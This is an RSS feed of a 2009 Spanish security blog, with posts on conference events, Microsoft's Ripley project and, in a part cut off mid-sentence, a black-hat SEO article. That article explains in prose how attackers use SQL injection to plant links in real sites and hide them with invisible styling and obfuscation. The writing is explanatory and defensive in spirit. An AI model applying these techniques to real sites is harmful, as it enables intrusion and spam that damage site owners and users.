<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/rss2spanishfull.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:openSearch="http://a9.com/-/spec/opensearch/1.1/" xmlns:georss="http://www.georss.org/georss" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" version="2.0"><channel><atom:id>tag:blogger.com,1999:blog-21555208</atom:id><lastBuildDate>Fri, 13 Nov 2009 00:53:23 +0000</lastBuildDate><title>Un informático en el lado del mal</title><description>&lt;center&gt;Spectra, Técnicoless, Técnico-Less, Blind SQL Injection, LDAP Injection &amp;amp; Blind LDAP Injection, Retos Hacking, Metadatos, FOCA, MetaShield Protector, Connection String Attacks, Maligno, Spectra, Seguridad Informática, Hacking, tocar los webos...y Chema Alonso.&lt;/center&gt;</description><link>http://elladodelmal.blogspot.com/</link><managingEditor>noreply@blogger.com (Maligno)</managingEditor><generator>Blogger</generator><openSearch:totalResults>1430</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" href="http://feeds.feedburner.com/ElLadoDelMal" type="application/rss+xml" /><feedburner:emailServiceId>ElLadoDelMal</feedburner:emailServiceId><feedburner:feedburnerHostname>http://feedburner.google.com</feedburner:feedburnerHostname><feedburner:feedFlare href="http://www.newsgator.com/ngs/subscriber/subext.aspx?url=http%3A%2F%2Ffeeds.feedburner.com%2FElLadoDelMal" src="http://www.newsgator.com/images/ngsub1.gif">Subscribe with NewsGator</feedburner:feedFlare><feedburner:feedFlare href="http://www.bloglines.com/sub/http://feeds.feedburner.com/ElLadoDelMal" src="http://www.bloglines.com/images/sub_modern11.gif">Subscribe with Bloglines</feedburner:feedFlare><feedburner:feedFlare href="http://www.netvibes.com/subscribe.php?url=http%3A%2F%2Ffeeds.feedburner.com%2FElLadoDelMal" src="http://www.netvibes.com/img/add2netvibes.gif">Subscribe with Netvibes</feedburner:feedFlare><feedburner:feedFlare href="http://fusion.google.com/add?feedurl=http%3A%2F%2Ffeeds.feedburner.com%2FElLadoDelMal" src="http://buttons.googlesyndication.com/fusion/add.gif">Subscribe with Google</feedburner:feedFlare><feedburner:feedFlare href="http://www.pageflakes.com/subscribe.aspx?url=http%3A%2F%2Ffeeds.feedburner.com%2FElLadoDelMal" src="http://www.pageflakes.com/ImageFile.ashx?instanceId=Static_4&amp;fileName=ATP_blu_91x17.gif">Subscribe with Pageflakes</feedburner:feedFlare><feedburner:feedFlare href="http://add.my.yahoo.com/content?lg=es&amp;url=http%3A%2F%2Ffeeds.feedburner.com%2FElLadoDelMal" src="http://eur.i1.yimg.com/eur.yimg.com/i/es/my/addto1.gif">Subscribe with My Yahoo!</feedburner:feedFlare><feedburner:feedFlare href="http://www.feedness.com/alta/http://feeds.feedburner.com/ElLadoDelMal" src="http://www.feedness.com/ayuda/wp-content/square_b_sh_feed.gif">Subscribe with Feedness</feedburner:feedFlare><feedburner:browserFriendly>¡Saludos Malignos!</feedburner:browserFriendly><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com" /><item><guid isPermaLink="false">tag:blogger.com,1999:blog-21555208.post-311138678831808676</guid><pubDate>Thu, 12 Nov 2009 13:00:00 +0000</pubDate><atom:updated>2009-11-12T16:35:31.870+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Eventos</category><title>Eventos para la semana que viene</title><description>&lt;div align="justify"&gt;Tras el subidón que tengo con &lt;a href="http://elladodelmal.blogspot.com/2009/11/mentiria.html"&gt;la aceptación de la charla en la Black Hat&lt;/a&gt; os voy a dejar una lista de cosas que tenemos para la semana que viene, para seguir estudiando ;)&lt;br /&gt;&lt;br /&gt;Si te pilla bie Polonia, &lt;strong&gt;&lt;em&gt;José "el abuelo" Parada&lt;/em&gt;&lt;/strong&gt; y yo estaremos cantando en la &lt;a href="http://200902.confidence.org.pl/"&gt;CONFidence 2009 en Varsovia&lt;/a&gt; para hablar de &lt;a href="http://elladodelmal.blogspot.com/2009/07/arithmetic-blind-sql-injection-i-de-ii.html"&gt;Arithmetic Blind SQL Injection&lt;/a&gt;, &lt;a href="http://elladodelmal.blogspot.com/2009/09/inverted-sql-queries-i-de-ii.html"&gt;Inverted SQL Injection&lt;/a&gt; y &lt;a href="http://elladodelmal.blogspot.com/2008/01/time-based-blind-sql-injection-using.html"&gt;Time-Based Blind SQL Injection using Heavy queries&lt;/a&gt;. Para que nos salga muy bien, muy bien, pero que muy bien la charla nos iremos del miercoles a domingo, ya sabéis, para estar &lt;em&gt;"en ambiente"&lt;/em&gt; allí, que creo que hay gente muy agradable...&lt;br /&gt;&lt;br /&gt;Antes de irme estaré el lunes por la tarde dando una charla a través de Internet en &lt;a href="http://www.e-gallaecia.com/"&gt;e-Gaelica &lt;/a&gt;(que trae &lt;a href="http://www.e-gallaecia.com/descargas/Agenda_TechBusiness_Week_2009.pdf"&gt;una agenda&lt;/a&gt; cuato menos &lt;em&gt;"peculiar"&lt;/em&gt;) y el martes en Palma de Mallorca en el &lt;a href="http://elladodelmal.blogspot.com/2009/08/innovation-tour-2009.html"&gt;Innovation Tour&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Mis compañeros se encargarán de llevar la &lt;a href="http://www.informatica64.com/dlinkacademy/"&gt;Azlan D-Link Academy&lt;/a&gt; a Pamplona por primera vez. También estaremos en &lt;a href="http://www.microsoft.com/spain/office/ceusv/agenda.aspx"&gt;CEUS V, la 5ª edición de la Conferencia Española de Usuarios de SharePoint, que se celebrará en Madrid&lt;/a&gt; y que tiene charlas para todos los gustos, en sesiones plenarias y tracks en paralelo. Allí estaremos presentando Exchange Server 2010, Apolo (ya os hablaré más de él en futuros posts) y &lt;a href="http://www.metashieldprotector.com"&gt;MetaShield Protector&lt;/a&gt;. Por último, para los amantes de los HOLs habrá dos &lt;a href="http://www.microsoft.com/spain/seminarios/hol.mspx"&gt;Hands On Lab en Madrid&lt;/a&gt; esta semana y &lt;a href="http://questsoftware.wordpress.com/2009/11/03/875/"&gt;el día 18 nuestros amigos de Quest tienen un evento sobre VDI&lt;/a&gt; ...con magia...&lt;br /&gt;&lt;br /&gt;Este es el resumen día a día:&lt;br /&gt;&lt;br /&gt;- 16 [Pamplona] &lt;a href="http://www.informatica64.com/dlinkacademy/"&gt;DL05 Cámaras de Video Vigilancia IP&lt;/a&gt;&lt;br /&gt;- 17 [Pamplona] &lt;a href="http://www.informatica64.com/dlinkacademy/"&gt;DL04 Tecnología WiFi&lt;/a&gt;&lt;br /&gt;- 17 [Palma de Mallorca] &lt;a href="http://elladodelmal.blogspot.com/2009/08/innovation-tour-2009.html"&gt;Innovation Tour Palma de Mallorca&lt;/a&gt;&lt;br /&gt;- 17 [Madrid] &lt;a href="http://www.microsoft.com/spain/office/ceusv/agenda.aspx"&gt;CEUS V&lt;/a&gt;  &lt;br /&gt;- 18 [Pamplona] &lt;a href="http://www.informatica64.com/dlinkacademy/"&gt;DL03 Tecnología Firewalling&lt;/a&gt;&lt;br /&gt;- 18 [Madrid] &lt;a href="http://questsoftware.wordpress.com/2009/11/03/875/"&gt;Quest VDI&lt;/a&gt;- 19 [Pamplona] &lt;a href="http://www.informatica64.com/dlinkacademy/"&gt;DL02 Tecnología Switching&lt;/a&gt;&lt;br /&gt;- 19 [Madrid] &lt;a href="http://www.microsoft.com/spain/seminarios/hol.mspx"&gt;HOL-WIN58 MS Windows Server Update Services&lt;/a&gt; &lt;br /&gt;- 20 [Madrid] &lt;a href="http://www.microsoft.com/spain/seminarios/hol.mspx"&gt;HOL-WIN55 MS Windows Server 2K8R2. IPSec&lt;/a&gt; &lt;br /&gt;&lt;br /&gt;Saludos Malignos!&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;a href="http://elladodelmal.blogspot.com" target="new"&gt;http://elladodelmal.blogspot.com&lt;/a&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/21555208-311138678831808676?l=elladodelmal.blogspot.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/ElLadoDelMal/~4/l6jG-T73Ruo" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/ElLadoDelMal/~3/l6jG-T73Ruo/eventos-para-la-semana-que-viene.html</link><author>noreply@blogger.com (Maligno)</author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">3</thr:total><feedburner:origLink>http://elladodelmal.blogspot.com/2009/11/eventos-para-la-semana-que-viene.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-21555208.post-2005849797550900914</guid><pubDate>Thu, 12 Nov 2009 06:56:00 +0000</pubDate><atom:updated>2009-11-12T08:00:52.551+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Eventos</category><category domain="http://www.blogger.com/atom/ns#">Hacking</category><category domain="http://www.blogger.com/atom/ns#">CSPP</category><title>Mentiría</title><description>&lt;div align="justify"&gt;Mentiría si dijera que no me gusta mi trabajo. Mentiría si dijera que cuando voy a dar una charla a esa Pamplona que me trata tan bien voy sufriendo. Mentiría si dijera que cuando voy a Galicia voy forzado a dar una conferencia o que cuando mi público son estudiantes o gente empezando con la seguridad informática lo hago a disgusto. Sería un gran mentiroso si dijera que cuando me dan un  micrófono, conectan mi portátil a la salida de vídeo y es mi turno de hablar en una charla en Valladolid o Valencia estoy sufriendo o pensando en cuando se va a terminar. Diría otra mentira si dijera que cada vez que me subo al escenario del auditorio de Barcelona no tengo recuerdos buenos de todas las veces que he estado allí o que cuando en Madrid se monta un evento en el auditorio de Getafe, Kinépolis o los mega escenarios del auditorio de Congresos o el Juan Carlos I no me siento contento. Mentiría si dijera que ahora que estamos preparando nuestro viaje a las islas dijera que no estamos preparando ya una cena y cachondeo para nosotros.&lt;br /&gt;&lt;br /&gt;Me gusta mi trabajo y aun, cuando después de tantos años parece que uno se puede llegar a cansar de este trabajo, todavía hay veces que abro el correo y disfruto como la primera vez.&lt;br /&gt;&lt;br /&gt;Ayer me llegó la confirmación de que la charla de Connection String Parameter Pollution ha sido aceptada para la próxima Black Hat USA DC 2010 que tendrá lugar en Febrero en Whasington DC y mentiría si dijera que no me revolucioné y revolucioné a los compañeros.&lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_Y2uWeGSk9Sw/Svuyd2OoqhI/AAAAAAAAFgk/Klzu3-84S8E/s1600-h/BHUSADC.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 329px;" src="http://1.bp.blogspot.com/_Y2uWeGSk9Sw/Svuyd2OoqhI/AAAAAAAAFgk/Klzu3-84S8E/s400/BHUSADC.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5403108403803892242" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;em&gt;Mail de confirmación&lt;/em&gt;&lt;/center&gt;&lt;br /&gt;Estas conferencias, como espero que tenga la RootedCon en Madrid, tienen siempre algo de especial, por todo. La temática, los ponentes, el ambiente, la pasión que trae la gente y las cosas que se aprenden allí, no sólo en las charlas, también en los bares.&lt;br /&gt;&lt;br /&gt;Es la tercera vez que voy a hablar en Black Hat, pero la primera en USA, y tenía muchas ganas de estar allí. Durante estos dos años y medio que hace que me decidí a dar charlas en inglés, he tenido la suerte de estar en conferencias muy chulas pero tenía ganas de ir a una BH USA. Cuando terminamos la charla en I64, sabíamos que tenía muchas posibilidades de ser aceptada, pero, como quería tener un detalle con mis amigos de la Ekoparty de Argentina, decidí que, aunque no nos la aceptaran en BH por haber sido “cantada” con anterioridad, primeramente se iba a estrenar en Buenos Aires. &lt;br /&gt;&lt;br /&gt;Al final, todos contentos, porque me voy a la BH USA DC 2010 y mentiría si no estoy encantado. &lt;br /&gt;&lt;br /&gt;Saludos Malignos!&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;a href="http://elladodelmal.blogspot.com" target="new"&gt;http://elladodelmal.blogspot.com&lt;/a&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/21555208-2005849797550900914?l=elladodelmal.blogspot.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/ElLadoDelMal/~4/YGS-_SokolQ" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/ElLadoDelMal/~3/YGS-_SokolQ/mentiria.html</link><author>noreply@blogger.com (Maligno)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/_Y2uWeGSk9Sw/Svuyd2OoqhI/AAAAAAAAFgk/Klzu3-84S8E/s72-c/BHUSADC.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">16</thr:total><feedburner:origLink>http://elladodelmal.blogspot.com/2009/11/mentiria.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-21555208.post-5229176319933743911</guid><pubDate>Wed, 11 Nov 2009 14:11:00 +0000</pubDate><atom:updated>2009-11-11T15:59:57.760+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Windows Vista</category><category domain="http://www.blogger.com/atom/ns#">Mac</category><category domain="http://www.blogger.com/atom/ns#">Linux</category><category domain="http://www.blogger.com/atom/ns#">Windows 7</category><category domain="http://www.blogger.com/atom/ns#">Windows XP</category><title>Cauce natural</title><description>&lt;div align="justify"&gt;Curiosas las tendencias de uso de sistemas operativos según marketshare. Sube Windows Vista, sube Windows 7, bajan los Mac OS X, Linux sigue condenado por debajo del 1%, Windows XP cae poco a poco, esto parece como la comparsa de un plan universal pre-establecido para ganar "billones" de adeptos...&lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;object width="425" height="344"&gt;&lt;param name="movie" value="http://www.youtube.com/v/mjhYtEd3bu8&amp;hl=es&amp;fs=1&amp;"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/mjhYtEd3bu8&amp;hl=es&amp;fs=1&amp;" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_Y2uWeGSk9Sw/SvrQPbYLvAI/AAAAAAAAFgc/sz8ly0JJrno/s1600-h/marketshare.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 248px;" src="http://1.bp.blogspot.com/_Y2uWeGSk9Sw/SvrQPbYLvAI/AAAAAAAAFgc/sz8ly0JJrno/s400/marketshare.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5402859666450136066" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;em&gt;&lt;a href="http://marketshare.hitslink.com/os-market-share.aspx?qprid=11&amp;qptimeframe=M&amp;qpsp=119&amp;qpnp=11&amp;qpdt=1&amp;qpct=4"&gt;MarketShare hasta día de hoy&lt;/a&gt;&lt;/em&gt;&lt;br /&gt;&lt;br /&gt;&lt;object width="425" height="344"&gt;&lt;param name="movie" value="http://www.youtube.com/v/O1S6YQRVFak&amp;hl=es&amp;fs=1&amp;"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/O1S6YQRVFak&amp;hl=es&amp;fs=1&amp;" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/center&gt;&lt;br /&gt;Saludos ....Malignos!&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;a href="http://elladodelmal.blogspot.com" target="new"&gt;http://elladodelmal.blogspot.com&lt;/a&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/21555208-5229176319933743911?l=elladodelmal.blogspot.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/ElLadoDelMal/~4/LB_Hin7dsfo" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/ElLadoDelMal/~3/LB_Hin7dsfo/cauce-natural.html</link><author>noreply@blogger.com (Maligno)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/_Y2uWeGSk9Sw/SvrQPbYLvAI/AAAAAAAAFgc/sz8ly0JJrno/s72-c/marketshare.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">11</thr:total><feedburner:origLink>http://elladodelmal.blogspot.com/2009/11/cauce-natural.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-21555208.post-5443598343898613831</guid><pubDate>Wed, 11 Nov 2009 07:31:00 +0000</pubDate><atom:updated>2009-11-11T08:39:46.121+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Internet</category><category domain="http://www.blogger.com/atom/ns#">Seguridad Informática</category><title>Ripley</title><description>&lt;div align="justify"&gt;Tal vez al leer este título hayas pensado rápidamente en Alien, el Octavo pasajero. Otro de esos personajes de culto de los que tengo libros, comics y todas las películas en versión original, extendida, y montaje del director en una edición especial que se llama Quadrology.&lt;br /&gt;&lt;br /&gt;Si he de ser sincero creo que el que el &lt;a href="http://research.microsoft.com/en-us/projects/ripley/"&gt;proyecto se llame Ripley &lt;/a&gt;algo debe de tener que ver con dicha película ya que Ripley, incluso con su muerte o con esa relación materno-filial que mantuvieron en una de las entregas, siempre ha vencido al Alien.&lt;br /&gt;&lt;br /&gt;Tal vez por eso los investigadores de Microsoft Research le pusieron este nombre al proyecto en el que se intenta, por medio de una nueva aproximación, vencer al Alien que se introduce entre la aplicación web y el servidor o tal vez porque es por medio de un clon, como en Alien Resurection, con el que se quiere ganar la batalla.&lt;br /&gt;&lt;br /&gt;La idea de la arquitectura en tres niveles, o en tres capas, divide las responsabilidades de cada elemento de forma clara. El almacén de datos debe cuidar de la integridad de la información, la lógica de negocio que corra en el servidor de aplicaciones y la interfaz de usuario en el cliente. Si bien esta división de Navegador, Servidor Web y Motor de Base de datos con funcionalidades repartidas ha evolucionado a una mayor granularidad con la división interna en otras capas de las funciones, apareciendo capas de acceso a datos, componentes distribuidos, servicios y todo lo que lleva el diseño moderno de servicios, sigue siendo más que valido este modelo para definir las aplicaciones web a alto nivel.&lt;br /&gt;&lt;br /&gt;Si se da por perdido el navegador, es decir, por totalmente infectado, malévolo, interceptado o directamente como principal enemigo, el servidor web debe tomar todas las entradas como potencialmente maliciosas. Este comportamiento se basa en el principio de Defensa en Profundidad de las reglas de la fortificación de sistemas por las que se asume que todo elemento adyacente puede estar comprometido.&lt;br /&gt;&lt;br /&gt;La aproximación hasta el momento se ha centrado en validar los datos y es ahí donde los atacantes se han esforzado en evolucionar, hacia la forma de crear nuevos patrones válidos de entrada que se salten las medidas de seguridad establecidas en el servidor. Esta aproximación a la solución obvia por completo la existencia del elemento principal del cliente: El interfaz de usuario.&lt;br /&gt;&lt;br /&gt;Para ello, el proyecto Ripley propone hacer un clon del interfaz de usuario y reproducir las acciones realizadas por el usuario en el interfaz pero en el servidor. Es decir, si un usuario realiza una secuencia de 10 clics en 10 zonas distintas de la interfaz para generar un listado de datos, tradicionalmente se convierte en una llamada a un procedimiento de un servidor con una serie de parámetros. En un entorno de ataque, es probable que esa llamada no se haya producido haciendo clics en el interfaz, sino manipulando las llamadas. &lt;br /&gt;&lt;br /&gt;Con Ripley la idea es que se validen los 10 clics en un clon que va a correr en el servidor y que va a permitir saber si esa acción que está realizando el cliente está permitida por el interfaz de usuario o no. Para poder validar la interfaz se ejecutará el clon del navegador, escrito en .NET en esta prueba de concepto, en el servidor web y sobre dicho clon se probarán las acciones recibidas desde el cliente. Si las acciones funcionan en el clon se continuará adelante con la aplicación. Si no funcionan en el clon no se ejecutarán en el servidor.&lt;br /&gt;&lt;br /&gt;Esta aproximación a la solución de validación es un punto más en la fortificación de aplicaciones y una nueva aproximación a la seguridad de de las mismas. Abre muchas interrogantes sobre la carga de cómputo en el servidor, sobre meter una nueva capa de software que también puede ser víctima de ataques o de que no reproduzca fielmente la interfaz. Esto es especialmente delicado en el usao de plug-ins o componentes corriendo en el navegador. De momento es un proyecto del mundo académico, pero desde luego es una idea curiosa.&lt;br /&gt;&lt;br /&gt;Puedes leer el &lt;a href="http://research.microsoft.com/apps/pubs/default.aspx?id=101931"&gt;Paper de Ripley&lt;/a&gt; y tienes más información en &lt;a href="http://blog.segu-info.com.ar/2009/11/una-herramienta-de-seguridad-web-que.html"&gt;Segu-Info&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Saludos Malignos!&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;a href="http://elladodelmal.blogspot.com" target="new"&gt;http://elladodelmal.blogspot.com&lt;/a&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/21555208-5443598343898613831?l=elladodelmal.blogspot.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/ElLadoDelMal/~4/YeCC7G7HpgM" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/ElLadoDelMal/~3/YeCC7G7HpgM/ripley.html</link><author>noreply@blogger.com (Maligno)</author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">4</thr:total><feedburner:origLink>http://elladodelmal.blogspot.com/2009/11/ripley.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-21555208.post-4024180387148127546</guid><pubDate>Mon, 09 Nov 2009 23:01:00 +0000</pubDate><atom:updated>2009-11-09T22:27:38.569+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">SQL Injection</category><category domain="http://www.blogger.com/atom/ns#">SEO</category><category domain="http://www.blogger.com/atom/ns#">Hacking</category><category domain="http://www.blogger.com/atom/ns#">Google</category><category domain="http://www.blogger.com/atom/ns#">Internet</category><title>Técnicas SEO para gente de moral relajada [IV de VI]</title><description>&lt;div align="justify"&gt;**********************************************************************************************&lt;br /&gt;- &lt;a href="http://elladodelmal.blogspot.com/2009/10/seo-para-gente-de-moral-relajada-i-de.html"&gt;Técnicas SEO para gente de moral relajada [I de VI]&lt;/a&gt;&lt;br /&gt;- &lt;a href="http://elladodelmal.blogspot.com/2009/10/tecnicas-seo-para-gente-de-moral.html"&gt;Técnicas SEO para gente de moral relajada [II de VI]&lt;/a&gt;&lt;br /&gt;- &lt;a href="http://elladodelmal.blogspot.com/2009/11/tecnicas-seo-para-gente-de-moral.html"&gt;Técnicas SEO para gente de moral relajada [III de VI]&lt;/a&gt;&lt;br /&gt;- &lt;a href="http://elladodelmal.blogspot.com/2009/11/tecnicas-seo-para-gente-de-moral_09.html"&gt;Técnicas SEO para gente de moral relajada [IV de VI]&lt;/a&gt;&lt;br /&gt;- Técnicas SEO para gente de moral relajada [V de VI]&lt;br /&gt;- Técnicas SEO para gente de moral relajada [VI de VI]&lt;br /&gt;&lt;em&gt;Autores: Chema Alonso &amp; Enrique Rando&lt;/em&gt;&lt;br /&gt;**********************************************************************************************&lt;br /&gt;&lt;br /&gt;Como se ha visto en las primeras partes de este artículo, las técnicas hasta el momento se han basado en utilizar sistemas de Spam más o menos automatizados, desde la inclusión de comentarios o temas de debate en foros que son auto-contestados, hasta el aprovechamiento de cualquier sitio web que permita incluir HTML para poner anuncios, como el ejemplo visto con Moodle que puede ser trasladado a cualquier otro. &lt;br /&gt;&lt;br /&gt;Sin embargo, hay otras formas de conseguir los tan deseados hipervínculos a las páginas de los clientes, aunque esto signifique cruzar la línea de la legalidad un poco más todavía. Para ello, los &lt;em&gt;“expertos en posicionamiento de sombrero negro”&lt;/em&gt;, los Black SEO, utilizan las técnicas hacker más conocidas para colonizar, troyanizar o cambiar el código de una página web con links a los sitios que se desea subir en el ranking.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;SQL Injection&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Hace un par de años que se puso de moda el uso de explotación de vulnerabilidades en páginas web con SQL Injection para introducir código script que pudiera ser utilizado en la distribución de malware [&lt;a href="http://www.inteco.es/Prensa/Actualidad_INTECO/Infeccion_masiva_de_paginas_web"&gt;Aviso Inteco&lt;/a&gt;]. En ese caso se realizaban inyecciones con comandos Update que añadían código javascript a cualquier string almacenado en la página web. David Carmona hizo una presentación sobre eso en el &lt;a href="http://elladodelmal.blogspot.com/2008/12/asegrit-iii-online.html"&gt;Asegúr@IT III&lt;/a&gt; que tuvo lugar en Bilbao.&lt;br /&gt;&lt;br /&gt;La idea en este caso es similar, sólo que se van a introducir links en el contenido que se publica de una página web desde base de datos. Así, es posible encontrar sitios como el este de Castilla la Mancha donde se ha introducido código con hipervínculos.&lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_Y2uWeGSk9Sw/SviEDBb1ecI/AAAAAAAAFgU/R8dlJvYwGm4/s1600-h/Figura15.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 263px;" src="http://4.bp.blogspot.com/_Y2uWeGSk9Sw/SviEDBb1ecI/AAAAAAAAFgU/R8dlJvYwGm4/s400/Figura15.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5402212940490570178" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;em&gt;Figura 15: Web de Castilla La Mancha vulnerada&lt;/em&gt;&lt;/center&gt;&lt;br /&gt;En este ejemplo, los hipervínculos están visibles para el usuario, pero los expertos en Black SEO saben que esto no es lo recomendable ya que no es estrictamente necesario. Para ello, y con el fin de evitar que los administradores descubran que su sitio web ha sido vulnerado, aprovechan las funcionalidades que oferta HTML para ocultar dichos links.&lt;br /&gt;&lt;br /&gt;Se utilizan técnicas como poner el tamaño de la letra invisible, o usar el comando &lt;em&gt;display=”none”&lt;/em&gt; o incluso colocar capas con links en posiciones no visibles en el marco de la página. Son trucos sencillos, pero muy eficaces. Esto se pudo comprobar en &lt;a href="http://elladodelmal.blogspot.com/2009/09/jodido-por-la-viagra.html"&gt;el ejemplo del Teatro Real &lt;/a&gt;en el que aparecían links a Viagra ocultos en su web que no eran visibles a primera vista gracias a que el atacante usaba un estilo oculto.&lt;br /&gt;&lt;br /&gt;Es fácil encontrar ejemplos así, basta con buscar en Google algún sitio y probar con un término propenso a ser cliente de Black SEO. En este caso en la Universidad de Alcalá de Henares aparecen más de 2.000 páginas recomendando Viagra.&lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_Y2uWeGSk9Sw/SviD7iM4lgI/AAAAAAAAFgM/RNY4xSUYWOs/s1600-h/Figura16.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 89px;" src="http://1.bp.blogspot.com/_Y2uWeGSk9Sw/SviD7iM4lgI/AAAAAAAAFgM/RNY4xSUYWOs/s400/Figura16.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5402212811847276034" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;em&gt;Figura 16: Viagra en la Universidad de Alcalá de Henares&lt;/em&gt;&lt;/center&gt;&lt;br /&gt;Basta con ir a una de ellas y analizarla. Aunque a primera vista no se ve nada.&lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/_Y2uWeGSk9Sw/SviD7XYbJtI/AAAAAAAAFgE/JbwxWwzt-Is/s1600-h/Figura17.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 257px;" src="http://3.bp.blogspot.com/_Y2uWeGSk9Sw/SviD7XYbJtI/AAAAAAAAFgE/JbwxWwzt-Is/s400/Figura17.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5402212808942888658" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;em&gt;Figura 17: Aparentemente no hay ningún enlace&lt;/em&gt;&lt;/center&gt;&lt;br /&gt;En el código fuente están todos los links, en este caso mediante un código script que imprime los links en una capa invisible.&lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_Y2uWeGSk9Sw/SviD7O1BFHI/AAAAAAAAFf8/7hgIuOuy3Vk/s1600-h/Figura18.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 205px;" src="http://4.bp.blogspot.com/_Y2uWeGSk9Sw/SviD7O1BFHI/AAAAAAAAFf8/7hgIuOuy3Vk/s400/Figura18.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5402212806646895730" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;em&gt;Figura 18: Hipervínculos ocultos en la web&lt;/em&gt;&lt;/center&gt;&lt;br /&gt;Comprobar que esta página web tiene SQL Injection es trivial, una vez colonizada de esta manera.&lt;br /&gt;&lt;br /&gt;Cómo el uso de texto oculto es algo que los buscadores penalizan, pudiendo llegar a ser motivo de exclusión de las páginas de resultados es común que se usen técnicas de ofuscación de código para engañar a las arañas e indexadores. Todo parásito inteligente hace lo posible por no acabar con el beneficio que le ofrece su víctima.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;Modificación de plantillas&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Por supuesto, lo mejor es poder tener una arquitectura flexible que permita cambiar 